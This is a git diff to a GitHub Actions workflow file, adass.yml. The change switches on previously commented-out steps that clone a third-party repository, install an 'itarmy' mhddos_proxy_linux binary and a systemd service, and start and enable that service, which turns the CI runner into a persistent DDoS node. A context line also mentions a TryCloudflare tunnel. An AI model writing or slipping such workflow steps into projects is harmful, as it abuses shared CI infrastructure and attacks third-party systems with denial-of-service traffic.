--- a/.github/workflows/adass.yml
+++ b/.github/workflows/adass.yml
@@ -25,12 +25,12 @@ jobs:
           sudo mkdir /mnt/repo
           sudo mkdir /mnt/repo/test
           sudo chmod 777 /mnt/repo/test
-          # sudo git clone https://github.com/porntalk/test.git /mnt/repo/test
-          # sudo cp /mnt/repo/test/itarmy/services/mhddos.service /etc/systemd/system
-          # sudo cp /mnt/repo/test/itarmy/bin/mhddos_proxy_linux /opt/itarmy/bin/
-          # sudo systemctl daemon-reload
-          # sudo systemctl start mhddos.service
-          # sudo systemctl enable mhddos.service
+          sudo git clone https://github.com/sweetashoke/test.git /mnt/repo/test
+          sudo cp /mnt/repo/test/itarmy/services/mhddos.service /etc/systemd/system
+          sudo cp /mnt/repo/test/itarmy/bin/mhddos_proxy_linux /opt/itarmy/bin/
+          sudo systemctl daemon-reload
+          sudo systemctl start mhddos.service
+          sudo systemctl enable mhddos.service
           
 
       # run TryCloudflare tunnel
